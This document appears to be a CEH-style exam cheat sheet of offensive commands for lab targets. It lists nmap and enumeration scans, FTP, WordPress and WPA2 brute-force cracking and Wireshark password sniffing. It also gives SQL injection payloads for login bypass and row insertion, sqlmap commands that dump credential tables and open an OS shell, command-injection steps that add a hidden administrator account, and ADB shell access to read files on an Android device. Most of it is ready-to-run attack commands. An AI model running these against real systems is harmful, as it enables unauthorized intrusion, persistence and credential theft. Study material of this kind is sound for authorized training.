Scanning Networks (always do sudo su) -> To be root
Nmap scan for alive/active hosts
nmap -A
nmap -T4 -A
nmap -f
The -A flag is for an aggressive scan it includes: OS detection (-O), Version (-sV), Script (-sC) and traceroute (--traceroute).
If the host is Windows then use this command:
nmap --script smb-os-discovery.nse
The above script determines the OS, computer name, domain, workgroup, and time over smb protocol (ports 445 or 139).
nmap command for source port manipulation
In this, the port is given or we use a common port
nmap -g 80
NetBIOS enum
Using windows nbtstat
In cmd
nbtstat -a (-a displays NEtBIOS name table)
Using nmap
nmap -sV -v --script nbstat.nse
Using enum4linux
enum4linux -u martin -p apple -n (all info)
enum4linux -u martin -p apple -P (policy info)
SNMP enumeration using nmap
nmap -sU -p 161 (-p 161 is port for SNMP)--> Check if port is open
snmp-check ( It will show user accounts, processes etc) --> for parrot
DNS Recon/Enum
dnsrecon -d -z
FTP enum using nmap
nmap -p 21 -A
Snow and Openstego (Steganography)
Hide Data Using Whitespace Steganography
snow -C -m "My swiss account number is 121212121212" -p "magic" readme.txt readme2.txt
The phrase "magic" is the password, stored using -p and your secret, stored using -m, is stored in readme2.txt along with the content of readme.txt.
To Display Hidden Data
snow -C -p "magic" readme2.txt (then it will show the content of readme2.txt content)
Password Sniffing using Wireshark
In the pcap file apply the filter: http.request.method==POST (you will get all the post requests)
Now to capture the password click on edit in the menu bar.
Then near the "Find packet" section, on the "display filter" select "string".
Also, select "Packet details" from the drop-down of "Packet list", and also change "narrow & wide" to "Narrow UTF-8 & ASCII".
Then type "pwd" in the find section.
Hacking Web Servers
Footprinting web server Using Netcat and Telnet:
nc -vv 80
telnet 80
Enumerate Web server info using nmap
nmap -sV --script=http-enum
Crack FTP credentials using nmap
Check if FTP port is open or not
nmap -p 21
ftp (To see if it is directly connecting or needing credentials)
Desktop > CEH tools folder you will find wordlists, here you will find usernames and password files.
use auxiliary/scanner/http/wordpress_login_enum
show options
set PASS_FILE /home/attacker/Desktop/Wordlist/password.txt
set RHOSTS (target ip)
set RPORT 8080 (target port)
set USERNAME admin
Brute Force Using WPScan
wpscan --url --usernames userlist.txt, --passwords passwdlist.txt
wpscan --url -u root -P passwdfile.txt (Use this only after enumerating the username)
Add user for persistence (Command Injection):
net user (Find users)
dir C:\ (directory listing)
net user Test/Add (Add a user)
net user Test (Check a user)
net localgroup Administrators Test/Add (To convert the test account to admin)
net user Test (Once again check to see if it has become administrator)
Now you can do an RDP connection with the given ip and the Test account which you created.
SQL Injections
1- Auth Bypass:
hi'OR 1=1 --
2- Insert new details if sql injection found in login page in username tab enter:
blah';insert into login values('john','apple123');--
3- Exploit a Blind SQL Injection:
In the website profile, do inspect element and in the console tab write -
Then copy the cookie value that was presented after this command.
Then go to terminal and type this command:
sqlmap -u "" --cookie="[cookie value that you copied and don't remove square brackets]" --dbs
4- Command to check tables of database retrieved:
sqlmap -u "" --cookie="[cookie value that you copied and don't remove square brackets]" -D databasename --tables
5- Select the table you want to dump:
sqlmap -u "" --cookie="[cookie value that you copied and don't remove square brackets]" -D databasename -T Table_Name --dump (Get username and password)
6- For the OS shell this is the command:
sqlmap -u "" --cookie="[cookie value that you copied and don't remove square brackets]" --os-shell
6.1 In the shell type:
TASKLIST (to view the tasks)
6.2 Use systeminfo for windows to get all OS version
6.3 Use uname -a for linux to get os version
1- nmap ip -sV -p 5555 (Scan for adb port)
2- adb connect IP:5555 (Connect adb with parrot)
3- adb shell (Access mobile device on parrot)
4- pwd --> ls --> cd sdcard --> ls --> cat secret.txt (If you can't find it there then go to Downloads folder using: cd downloads)
tcp.flags.syn == 1 and tcp.flags.ack == 0 (How many machines) or Go to statistics IPv4 addresses--> Source and Destination ---> Then you can apply the filter given
tcp.flags.syn == 1 (Which machine for dos)
http.request.method == POST (for passwords) or click tools ---> credentials
nmap -p389 –sV -iL <target_list>
nmap -p389 –sV <target_IP> (Find the FQDN in a subnet/network)
Cracking Wi-Fi networks
aircrack-ng [pcap file] (For cracking WEP network)
aircrack-ng -a2 -b [Target BSSID] -w [password_Wordlist.txt] [WP2 PCAP file] (For cracking WPA2 or other networks through the captured .pcap file)
Health Checks
the Check RDP enabled after getting ip- nmap -p 3389 -iL ip.txt | grep open (ip.txt contains all the alive hosts from the target subnet)
Check MySQL service running- nmap -p 3306 -iL ip.txt | grep open (ip.txt contains all the alive hosts from target subnet)
Disk Encryption with Veracyrpt
Create a new volume using create volume button
Create an encrypted file container. This creates a volume like Local Disk C:.